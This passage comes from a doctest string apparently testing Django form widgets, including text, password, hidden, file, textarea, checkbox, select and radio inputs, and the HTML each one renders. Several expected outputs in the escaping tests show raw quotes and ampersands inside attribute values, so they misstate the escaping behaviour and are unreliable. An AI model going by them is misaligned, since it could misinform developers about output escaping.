u'<input type="text" name="email" value="test@example.com" class="fun" />'
# Note that doctest in Python 2.4 (and maybe 2.5?) doesn't support non-ascii
# characters in output, so we're displaying the repr() here.
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="text" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = TextInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="text" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="text" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = TextInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="text" class="special" name="email" />'
# PasswordInput Widget ############################################################
>>> w = PasswordInput()
>>> w.render('email', '')
u'<input type="password" name="email" />'
>>> w.render('email', None)
u'<input type="password" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="password" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="password" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="password" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = PasswordInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="password" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="password" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = PasswordInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="password" class="special" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="password" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
The render_value argument lets you specify whether the widget should render
its value. You may want to do this for security reasons.
>>> w = PasswordInput(render_value=True)
>>> w.render('email', 'secret')
u'<input type="password" name="email" value="secret" />'
>>> w = PasswordInput(render_value=False)
>>> w.render('email', '')
u'<input type="password" name="email" />'
>>> w.render('email', None)
u'<input type="password" name="email" />'
>>> w.render('email', 'secret')
u'<input type="password" name="email" />'
>>> w = PasswordInput(attrs={'class': 'fun'}, render_value=False)
>>> w.render('email', 'secret')
u'<input type="password" class="fun" name="email" />'
# HiddenInput Widget ############################################################
>>> w = HiddenInput()
>>> w.render('email', '')
u'<input type="hidden" name="email" />'
>>> w.render('email', None)
u'<input type="hidden" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="hidden" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="hidden" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = HiddenInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="hidden" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = HiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="hidden" class="special" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = HiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="hidden" class="special" name="email" />'
Boolean values are rendered to their string forms ("True" and "False").
>>> w = HiddenInput()
>>> w.render('get_spam', False)
u'<input type="hidden" name="get_spam" value="False" />'
>>> w.render('get_spam', True)
u'<input type="hidden" name="get_spam" value="True" />'
# MultipleHiddenInput Widget ##################################################
>>> w = MultipleHiddenInput()
>>> w.render('email', [])
u''
>>> w.render('email', None)
u''
>>> w.render('email', ['test@example.com'])
u'<input type="hidden" name="email" value="test@example.com" />'
>>> w.render('email', ['some "quoted" & ampersanded value'])
u'<input type="hidden" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', ['test@example.com', 'foo@example.com'])
u'<input type="hidden" name="email" value="test@example.com" />\n<input type="hidden" name="email" value="foo@example.com" />'
>>> w.render('email', ['test@example.com'], attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />'
>>> w.render('email', ['test@example.com', 'foo@example.com'], attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />\n<input type="hidden" name="email" value="foo@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'fun'})
>>> w.render('email', [])
u''
>>> w.render('email', ['foo@example.com'])
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />'
>>> w.render('email', ['foo@example.com', 'test@example.com'])
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />\n<input type="hidden" class="fun" value="test@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', ['foo@example.com'], attrs={'class': 'special'})
u'<input type="hidden" class="special" value="foo@example.com" name="email" />'
>>> w.render('email', ['ŠĐĆŽćžšđ'], attrs={'class': 'fun'})
u'<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', ['foo@example.com'], attrs={'class': 'special'})
u'<input type="hidden" class="special" value="foo@example.com" name="email" />'
# FileInput Widget ############################################################
FileInput widgets don't ever show the value, because the old value is of no use
if you are updating the form or if the provided file generated an error.
>>> w = FileInput()
>>> w.render('email', '')
u'<input type="file" name="email" />'
>>> w.render('email', None)
u'<input type="file" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="file" name="email" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="file" name="email" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="file" name="email" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = FileInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="file" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="file" class="fun" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="file" class="fun" name="email" />'
Test for the behavior of _has_changed for FileInput. The value of data will
more than likely come from request.FILES. The value of initial data will
likely be a filename stored in the database. Since its value is of no use to
a FileInput it is ignored.
>>> w = FileInput()
# No file was uploaded and no initial data.
>>> w._has_changed(u'', None)
False
# A file was uploaded and no initial data.
>>> w._has_changed(u'', {'filename': 'resume.txt', 'content': 'My resume'})
True
# A file was not uploaded, but there is initial data
>>> w._has_changed(u'resume.txt', None)
False
# A file was uploaded and there is initial data (file identity is not dealt
# with here)
>>> w._has_changed('resume.txt', {'filename': 'resume.txt', 'content': 'My resume'})
True
# Textarea Widget #############################################################
>>> w = Textarea()
>>> w.render('msg', '')
u'<textarea rows="10" cols="40" name="msg"></textarea>'
>>> w.render('msg', None)
u'<textarea rows="10" cols="40" name="msg"></textarea>'
>>> w.render('msg', 'value')
u'<textarea rows="10" cols="40" name="msg">value</textarea>'
>>> w.render('msg', 'some "quoted" & ampersanded value')
u'<textarea rows="10" cols="40" name="msg">some "quoted" & ampersanded value</textarea>'
>>> w.render('msg', mark_safe('pre "quoted" value'))
u'<textarea rows="10" cols="40" name="msg">pre "quoted" value</textarea>'
>>> w.render('msg', 'value', attrs={'class': 'pretty', 'rows': 20})
u'<textarea class="pretty" rows="20" cols="40" name="msg">value</textarea>'
You can also pass 'attrs' to the constructor:
>>> w = Textarea(attrs={'class': 'pretty'})
>>> w.render('msg', '')
u'<textarea rows="10" cols="40" name="msg" class="pretty"></textarea>'
>>> w.render('msg', 'example')
u'<textarea rows="10" cols="40" name="msg" class="pretty">example</textarea>'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = Textarea(attrs={'class': 'pretty'})
>>> w.render('msg', '', attrs={'class': 'special'})
u'<textarea rows="10" cols="40" name="msg" class="special"></textarea>'
>>> w.render('msg', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<textarea rows="10" cols="40" name="msg" class="fun">\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111</textarea>'
# CheckboxInput Widget ########################################################
>>> w = CheckboxInput()
>>> w.render('is_cool', '')
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', None)
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', False)
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', True)
u'<input checked="checked" type="checkbox" name="is_cool" />'
Using any value that's not in ('', None, False, True) will check the checkbox
and set the 'value' attribute.
>>> w.render('is_cool', 'foo')
u'<input checked="checked" type="checkbox" name="is_cool" value="foo" />'
>>> w.render('is_cool', False, attrs={'class': 'pretty'})
u'<input type="checkbox" name="is_cool" class="pretty" />'
You can also pass 'attrs' to the constructor:
>>> w = CheckboxInput(attrs={'class': 'pretty'})
>>> w.render('is_cool', '')
u'<input type="checkbox" class="pretty" name="is_cool" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = CheckboxInput(attrs={'class': 'pretty'})
>>> w.render('is_cool', '', attrs={'class': 'special'})
u'<input type="checkbox" class="special" name="is_cool" />'
You can pass 'check_test' to the constructor. This is a callable that takes the
value and returns True if the box should be checked.
>>> w = CheckboxInput(check_test=lambda value: value.startswith('hello'))
>>> w.render('greeting', '')
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', 'hello')
u'<input checked="checked" type="checkbox" name="greeting" value="hello" />'
>>> w.render('greeting', 'hello there')
u'<input checked="checked" type="checkbox" name="greeting" value="hello there" />'
>>> w.render('greeting', 'hello & goodbye')
u'<input checked="checked" type="checkbox" name="greeting" value="hello & goodbye" />'
A subtlety: If the 'check_test' argument cannot handle a value and raises any
exception during its __call__, then the exception will be swallowed and the box
will not be checked. In this example, the 'check_test' assumes the value has a
startswith() method, which fails for the values True, False and None.
>>> w.render('greeting', True)
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', False)
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', None)
u'<input type="checkbox" name="greeting" />'
The CheckboxInput widget will return False if the key is not found in the data
dictionary (because HTML form submission doesn't send any result for unchecked
checkboxes).
>>> w.value_from_datadict({}, {}, 'testing')
False
>>> w._has_changed(None, None)
False
>>> w._has_changed(None, u'')
False
>>> w._has_changed(u'', None)
False
>>> w._has_changed(u'', u'')
False
>>> w._has_changed(False, u'on')
True
>>> w._has_changed(True, u'on')
False
>>> w._has_changed(True, u'')
True
# Select Widget ###############################################################
>>> w = Select()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value is None, none of the options are selected:
>>> print w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
The value is compared to its str():
>>> print w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
The 'choices' argument can be any iterable:
>>> from itertools import chain
>>> def get_choices():
... for i in range(5):
... yield (i, i)
>>> print w.render('num', 2, choices=get_choices())
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
>>> things = ({'id': 1, 'name': 'And Boom'}, {'id': 2, 'name': 'One More Thing!'})
>>> class SomeForm(Form):
... somechoice = ChoiceField(choices=chain((('', '-'*9),), [(thing['id'], thing['name']) for thing in things]))
>>> f = SomeForm()
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>'
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>'
>>> f = SomeForm({'somechoice': 2})
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="">---------</option>\n<option value="1">And Boom</option>\n<option value="2" selected="selected">One More Thing!</option>\n</select></td></tr>'
You can also pass 'choices' to the constructor:
>>> w = Select(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('num', 2)
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('num', 2, choices=[(4, 4), (5, 5)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
# Choices are escaped correctly
>>> print w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me'))))
<select name="escape">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="bad">you & me</option>
<option value="good">you > me</option>
</select>
# Unicode choices are correctly rendered as HTML
>>> w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<select name="email">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>'
If choices is passed to the constructor and is a generator, it can be iterated
over multiple times without getting consumed:
>>> w = Select(choices=get_choices())
>>> print w.render('num', 2)
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
>>> print w.render('num', 3)
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3" selected="selected">3</option>
<option value="4">4</option>
</select>
Choices can be nested one level in order to create HTML optgroups:
>>> w.choices=(('outer1', 'Outer 1'), ('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))))
>>> print w.render('nestchoice', None)
<select name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', 'outer1')
<select name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', 'inner1')
<select name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1" selected="selected">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
# NullBooleanSelect Widget ####################################################
>>> w = NullBooleanSelect()
>>> print w.render('is_cool', True)
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', False)
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
>>> print w.render('is_cool', None)
<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', '2')
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', '3')
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
""" + \
r""" # [This concatenation is to keep the string below the jython's 32K limit].
# SelectMultiple Widget #######################################################
>>> w = SelectMultiple()
>>> print w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
>>> print w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
>>> print w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R" selected="selected">Ringo</option>
</select>
If the value is None, none of the options are selected:
>>> print w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If multiple values are given, but some of them are not valid, the valid ones are selected:
>>> print w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G" selected="selected">George</option>
<option value="R">Ringo</option>
</select>
The value is compared to its str():
>>> print w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
The 'choices' argument can be any iterable:
>>> def get_choices():
... for i in range(5):
... yield (i, i)
>>> print w.render('nums', [2], choices=get_choices())
<select multiple="multiple" name="nums">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
You can also pass 'choices' to the constructor:
>>> w = SelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('nums', [2])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('nums', [2], choices=[(4, 4), (5, 5)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
# Choices are escaped correctly
>>> print w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me'))))
<select multiple="multiple" name="escape">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="bad">you & me</option>
<option value="good">you > me</option>
</select>
# Unicode choices are correctly rendered as HTML
>>> w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<select multiple="multiple" name="nums">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>'
# Test the usage of _has_changed
>>> w._has_changed(None, None)
False
>>> w._has_changed([], None)
False
>>> w._has_changed(None, [u'1'])
True
>>> w._has_changed([1, 2], [u'1', u'2'])
False
>>> w._has_changed([1, 2], [u'1'])
True
>>> w._has_changed([1, 2], [u'1', u'3'])
True
# Choices can be nested one level in order to create HTML optgroups:
>>> w.choices = (('outer1', 'Outer 1'), ('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))))
>>> print w.render('nestchoice', None)
<select multiple="multiple" name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', ['outer1'])
<select multiple="multiple" name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', ['inner1'])
<select multiple="multiple" name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1" selected="selected">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>
>>> print w.render('nestchoice', ['outer1', 'inner2'])
<select multiple="multiple" name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2" selected="selected">Inner 2</option>
</optgroup>
</select>
# RadioSelect Widget ##########################################################
>>> w = RadioSelect()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
If the value is None, none of the options are checked:
>>> print w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
If the value corresponds to a label (but not to an option value), none of the options are checked:
>>> print w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
The value is compared to its str():
>>> print w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
>>> print w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
>>> print w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
The 'choices' argument can be any iterable:
>>> def get_choices():
... for i in range(5):
... yield (i, i)
>>> print w.render('num', 2, choices=get_choices())
<ul>
<li><label><input type="radio" name="num" value="0" /> 0</label></li>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
</ul>
You can also pass 'choices' to the constructor:
>>> w = RadioSelect(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('num', 2)
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('num', 2, choices=[(4, 4), (5, 5)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
<li><label><input type="radio" name="num" value="5" /> 5</label></li>
</ul>
RadioSelect uses a RadioFieldRenderer to render the individual radio inputs.
You can manipulate that object directly to customize the way the RadioSelect
is rendered.
>>> w = RadioSelect()
>>> r = w.get_renderer('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
>>> for inp in r:
... print inp
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
<label><input type="radio" name="beatle" value="P" /> Paul</label>
<label><input type="radio" name="beatle" value="G" /> George</label>
<label><input type="radio" name="beatle" value="R" /> Ringo</label>
>>> for inp in r:
... print '%s<br />' % inp
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label><br />
>>> for inp in r:
... print '<p>%s %s</p>' % (inp.tag(), inp.choice_label)
<p><input checked="checked" type="radio" name="beatle" value="J" /> John</p>
<p><input type="radio" name="beatle" value="P" /> Paul</p>
<p><input type="radio" name="beatle" value="G" /> George</p>
<p><input type="radio" name="beatle" value="R" /> Ringo</p>
>>> for inp in r:
... print '%s %s %s %s %s' % (inp.name, inp.value, inp.choice_value, inp.choice_label, inp.is_checked())
beatle J J John True
beatle J P Paul False
beatle J G George False
beatle J R Ringo False
You can create your own custom renderers for RadioSelect to use.
>>> class MyRenderer(RadioFieldRenderer):
... def render(self):
... return u'<br />\n'.join([unicode(choice) for choice in self])
>>> w = RadioSelect(renderer=MyRenderer)
>>> print w.render('beatle', 'G', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<label><input type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input checked="checked" type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label>
Or you can use custom RadioSelect fields that use your custom renderer.
>>> class CustomRadioSelect(RadioSelect):
... renderer = MyRenderer
>>> w = CustomRadioSelect()
>>> print w.render('beatle', 'G', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<label><input type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input checked="checked" type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label>
A RadioFieldRenderer object also allows index access to individual RadioInput
objects.
>>> w = RadioSelect()
>>> r = w.get_renderer('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
>>> print r[1]
<label><input type="radio" name="beatle" value="P" /> Paul</label>
>>> print r[0]
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
>>> r[0].is_checked()
True
>>> r[1].is_checked()
False
>>> r[1].name, r[1].value, r[1].choice_value, r[1].choice_label
('beatle', u'J', u'P', u'Paul')
>>> r[10] # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
IndexError: list index out of range
# Choices are escaped correctly
>>> w = RadioSelect()
>>> print w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me'))))
<ul>
<li><label><input type="radio" name="escape" value="bad" /> you & me</label></li>
<li><label><input type="radio" name="escape" value="good" /> you > me</label></li>
</ul>
# Unicode choices are correctly rendered as HTML
>>> w = RadioSelect()
